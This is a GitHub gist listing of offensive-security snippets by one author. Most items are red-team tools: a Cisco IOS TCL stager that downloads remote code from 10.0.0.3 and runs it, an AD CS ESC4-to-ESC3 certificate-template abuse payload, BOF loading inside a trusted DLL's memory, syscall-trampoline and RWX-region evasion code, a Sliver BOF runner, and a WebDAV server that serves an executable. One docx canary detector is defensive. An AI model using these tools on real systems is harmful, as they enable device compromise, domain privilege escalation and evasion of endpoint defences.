Skip to content

Instantly share code, notes, and snippets.

View zimnyaa's full-sized avatar

zimnyaa

132 followers · 8 following
View GitHub Profile
@zimnyaa
zimnyaa / filespoof_memfd.gdb
Created November 16, 2024 15:17
GDB script to spoof the nginx config file for a runtime reload with SIGHUP
set $conf = "server {\n\tlisten 8082 default_server;\n\tlisten [::]:8082 default_server;\n\troot /var/www/html;\n\tserver_name _;\n\tlocation / {\n\t\ttry_files $uri $uri/ =404;\n\t}\n}"
set $conf_len = $_strlen($conf)
set detach-on-fork off
break open
condition 1 $_streq((char *)$rdi, "/etc/nginx/sites-enabled/default")
# signal break
c
c
# open break
@zimnyaa
zimnyaa / ESC4-to-ESC3.sh
Created September 30, 2024 10:46
A simple way to abuse ESC4 without introducing ESC1 (creating an Enrollment Agent template instead).
# the policy JSON template for certipy is:
# {"showInAdvancedViewOnly": ["54525545"], "nTSecurityDescriptor": ["0100049c3000000000000000000000001400000002001c000100000000001400ff010f0001010000000000050b000000010500000000000515000000c8a31fdde9bab8902cae73bbf4010000"], "flags": ["313331363136"], "pKIDefaultKeySpec": ["32"], "pKIKeyUsage": ["8000"], "pKIMaxIssuingDepth": ["30"], "pKICriticalExtensions": ["322e352e32392e37", "322e352e32392e3135"], "pKIExpirationPeriod": ["004039872ee1feff"], "pKIOverlapPeriod": ["0080a60affdeffff"], "pKIExtendedKeyUsage": ["312e332e362e312e342e312e3331312e32302e322e31"], "pKIDefaultCSPs": ["312c4d6963726f736f667420456e68616e6365642043727970746f677261706869632050726f76696465722076312e30", "322c4d6963726f736f667420426173652043727970746f677261706869632050726f76696465722076312e30"], "msPKI-RA-Signature": ["30"], "msPKI-Enrollment-Flag": ["3332"], "msPKI-Private-Key-Flag": ["3136383432373532"], "msPKI-Certificate-Name-Flag": ["3333353534343332"], "msPKI-Minimal-Key-Size": ["32303438"]
@zimnyaa
zimnyaa / caveman-bof.diff
Created July 28, 2023 13:02
A patch for NiCOFF to load the BOF in a memory region of a trusted DLL.
diff --git a/Main.nim b/Main.nim
index ef19f4c..c133586 100644
--- a/Main.nim
+++ b/Main.nim
@@ -128,7 +128,7 @@ proc ApplyGeneralRelocations(patchAddress:uint64,sectionStartAddress:uint64,give
echo "[!] No code for type: ",givenType
var allocatedMemory:LPVOID = nil
-
+var caveLibH: HANDLE
@zimnyaa
zimnyaa / rwxscan.nim
Last active December 23, 2024 10:51
A simple dynamic RWX allocation scanner. Used to find system libraries that alloc RWX regions on load.
import winim
import std/strutils, os
proc lpwstrc(bytes: array[MAX_PATH, WCHAR]): string =
result = newString(bytes.len)
for i in bytes:
result &= cast[char](i)
result = strip(result, chars = {cast[char](0)})
var pages = newSeq[int](0)
@zimnyaa
zimnyaa / webdav.py
Created June 10, 2023 13:28
minimal webdav implementation to serve a single file
from flask import Flask, Response
import os, time
from io import BytesIO
from zipfile import ZipFile
from urllib.request import urlopen
from threading import Thread
from random import randint
exetemplate = """<?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/mempe.exe</D:href><D:propstat><D:prop><D:resourcetype></D:resourcetype><D:getcontentlength>{}</D:getcontentlength><D:getlastmodified>Wed, 07 Jun 2023 21:57:19 GMT</D:getlastmodified><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:displayname>mempe.exe</D:displayname><D:getcontenttype>application/x-msdownload</D:getcontenttype><D:getetag>"17667f43a6d9164c5000"</D:getetag></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>"""
roottemplate = """<?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/</D:href><D:propstat><D:prop><D:resourcetype><
@zimnyaa
zimnyaa / veh.go
Created June 8, 2023 11:58
Golang VEH example
package main
import (
"fmt"
"syscall"
"golang.org/x/sys/windows"
"C"
"time"
)
const (
@zimnyaa
zimnyaa / sliverbof.py
Created April 28, 2023 16:15
Runs a BOF from a sliver-py client with https://github.com/moloch--/sliver-py/pull/39/commits
import sys, asyncio
import time
import sliver
from struct import pack, calcsize
class BeaconPack: # thanks COFFLoader
def __init__(self):
self.buffer = b''
@zimnyaa
zimnyaa / cisco-beacon.tcl
Created March 1, 2023 13:48
A simple way of making Cisco IOS beacon back to you.
# stage.tcl
set id "cisco-R1"
source "tmpsys:lib/tcl/http.tcl"
::http::config -useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36 OPR/48.0.2685.32"
set httpToken [::http::geturl http://10.0.0.3/static/$id]
if {[lindex [split [::http::code $httpToken] " "] 1] == "200"} {
source [::http::data $httpToken]
}
@zimnyaa
zimnyaa / SWT.c
Last active May 21, 2023 04:25
A small modification to SysWhispers2 to use a trampoline for syscalls. Functions are renamed here SW2 -> SWT. It uses IsModulePresent/GetFunctionAddress from DarkLoadLibrary code (or VX-API).
// add this to syscalls.h
extern PVOID SWT_Trampoline;
VOID SWT_ResolveTrampoline();
// add this to syscalls.c
PVOID SWT_Trampoline;
VOID SWT_ResolveTrampoline()
{
HMODULE ntdllModule = IsModulePresent(L"ntdll.dll");
@zimnyaa
zimnyaa / canary-check.py
Created December 23, 2022 20:21
Scan .docx for canaries (not just footers :D). Based on https://github.com/n3tsurge/detect-canary/blob/main/detect-canary.py
import os
import re
import sys
import zipfile
import glob
import logging
import argparse
def get_files(base_path=".", pattern="*.docx"):
'''